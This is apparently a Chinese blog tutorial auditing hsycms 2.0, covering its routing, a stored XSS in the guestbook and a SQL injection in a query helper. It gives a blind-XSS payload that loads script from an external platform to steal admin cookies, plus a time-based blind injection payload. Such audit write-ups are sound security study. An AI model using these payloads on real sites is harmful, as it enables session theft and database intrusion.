本篇审计，以hsycms的2.0版本进行学习，目前该cms的最新版本已经到3.1了，以后有能力将对最新版本进行源码审计，官网地址：“http://www.hsycms.com”

Contents

1 目录结构
2 确定路由与过滤情况
3 XSS与SQL注入
- 3.1 XSS漏洞
  - 3.1.1 黑盒测试
  - 3.1.2 白盒审计
- 3.2 SQL注入漏洞
4 写配置文件GETSHELL

目录结构

前台首页的模块在index里，index模块的控制器里存在以下文件

后台的模块在hsycms文件夹里，hsycms模块的控制器里存在以下文件

确定路由与过滤情况

1.确定网站的路由

（1）通过分析URL直接得出

（2）查看app/route.php

2.了解参数过滤情况

（1）原生GET、POST、REQUEST

（2）系统外部变量获取函数get()、post()、request()

1.（1）比如：http://127.0.0.1/index.php/install/index/complete.html

解析：index.php是入口文件，install是app目录下的模块，index是controller（控制器）文件夹下的Index.php文件，complete.html是Index.php文件里的complete方法

1.（2）app.php内容如下

<?php
use think\Route;

//前端路由配置
if (is_file(APP_PATH.'common/install.lock')) {
  $routeNav  = db('nav')->field('entitle')->order('sort,id')->select();
  $routeCate = db('cate')->field('entitle')->order('sort,id')->select();
  Route::rule('search','index/Search/index');
  foreach ($routeNav as $key=>$v) {
      Route::rule($v['entitle'],'index/Article/index');
      Route::rule($v['entitle'].'/:id','index/Show/index');
  }
  foreach ($routeCate as $key=>$v) {
      Route::rule($v['entitle'],'index/Article/index');
  }
}

首先判断install.lock是否存在，存在进入if判断，接着查询nav表和cate表中的entitle列的所有内容，cate表同理

Route::rule(‘search’,’index/Search/index’);这一句是定义路由规则，访问search，相当于访问index模块下Search控制器下的index方法

foreach循环将上图查询的所有结果的访问（同上一条路由定义语句）都相当于访问index模块下的Article控制器下的index方法

XSS与SQL注入

XSS漏洞

黑盒测试

在后台留言的地方尝试测试XSS，发送过去。

登陆后台在留言管理处成功弹窗

且是一个存储型XSS，检查元素也发现什么都没有过滤。

如果在实战中，无法登陆后台，可以通过盲打XSS进行，同时注意实战尽量不要使用alert进行弹窗，可以通过XSS平台进行对管理员Cookie的获取,XSS平台“https://xss8.cc/”

创建项目，配置代码选个默认的即可，当然该平台现已有很多功能，读者可自行选择

完成后项目会给出很多现成的payload，读者根据实际情况进行简单修改下即可。

这里选择第一个默认的，payload: 456<sCRiPt sRC=https://xss8.cc/8g4j>123</sCrIpT>发送过去后，回到平台创建的项目处即可查看到获取到的Cookie

但是这里我用获取到的cookie，利用Editthiscookie的插件进行替换，刷新后并没有登录进管理员后台。

白盒审计

首先对存在XSS漏洞的评论处抓个包

可以看到发包对后端的请求，经过路由的设置后是发向index模块下的Show控制器下的sendemail方法

看下这个方法，首先接受POST请求的值给$data数组，然后对该数组中的datatime参数设置一个时间戳的值，接下来将执行一段SQL语句select email_issend from site where id=1;

如果返回的结果为1，则执行sendmail函数发送邮件。如果提交有数据，则将数据插入到book表中，插入成功则返回留言成功。

这里就存在问题，插入的过程中没有经过任何过滤。

接着去后台的留言管理处抓下包，看下这部分的代码应该在什么位置，这里注意访问后台管理的留言页面抓包后，需要再放下包抓到的第二个包才是真正的请求内容

很明显是hsycms模块下的Site控制器下的book方法

补充：paginate(每页数量,是否简洁分页,分页参数)

$this->assign(‘id’,$id);//定义一个模板变量id

所以这里值获取book表中数据以id字段为标准进行降序排列且每页只显示10组数据，同时定义两个模板变量：“list”、“page” ，渲染的代码是在view模块、site文件夹下的book.html文件

这种写法就会取出定义的模板变量，然后我们就发现插入的时候没有对用户输入进行过滤，而取出内容输出的时候又没有进行过滤，所以很明显存在一个存储型XSS漏洞

SQL注入漏洞

一般流程：
1.在seay中开启查询日志

2.发现系统的输入点，尝试输入一些内容并执行

3.跟随输入信息，判断输入的内容是否被过滤，是否可利用

4.构造注入语句进行测试

输入点总结：
1）表单提交，主要是POST请求，也包括GET请求。
2）URL参数提交，主要为GET请求参数。
3）Cookie参数提交。
4）HITP请求头部的一些可修改的值，某些Referer.User Agent等。
5）一些边缘的输入点，可以jpg文件的一些文件信息等。

补充：Vscode审计插件“Intelephense”，安装方法“https://www.cnblogs.com/-mrl/p/12214252.html”

首先查看下该cms对数据库的连接方法是什么，在libs->library->think->db->Query.php找到是以PDO的连接方式进行的，PDO详情参看“https://www.runoob.com/php/php-pdo.html”

这种方式可以很好的防范SQL注入，但是仍然也会有一些绕过方法。

测试

访问：http://192.168.12.106/product/123.html其中123可以任意修改，这个地方存在与数据库的交互情况，回忆之前的路由配置可以知道这里实际访问的时index模块下的Show控制器的index方法

Route::rule($v['entitle'].'/:id','index/Show/index');

$id=input(‘id’)意思是获取用户的输入，(路由那里的:id),同时注意获取到的值是字符串类型。

再看第二条语句

$one  = db('article')->where('id',$id)->find();

这个数据库查询语句就不像普通的查询一样，id的值是分离的，所以并不能构成注入条件。接着再向下搜索。

发现这里也有一个调用$id的地方，但是经过了prevNext的函数，那么按【Ctrl】+【鼠标左键】跟踪该函数

可以看到这个函数的where处的id就没有分离了，id和$id都在一个双引号下。所以这里可以有个思路构造Payload：

$prev=db('article')->field("id,title")->where("id < {$id} and nid={$one['nid']} and cid={$one['cid']}")->order('id desc')->limit('1')->find();  
//SELECT id,title from article where (id < 123 and nid=... and cid=...);
//123) and (payload) and (1=1 ...

payload:123) and sleep(1) and (1=1

因为这个是没有回显的，所以尝试利用时间盲注测试，http://192.168.12.106/product/123) and sleep(1) and (1=1页面成功延迟了。剩下的就是SQL注入的知识了，在payload那里构造即可。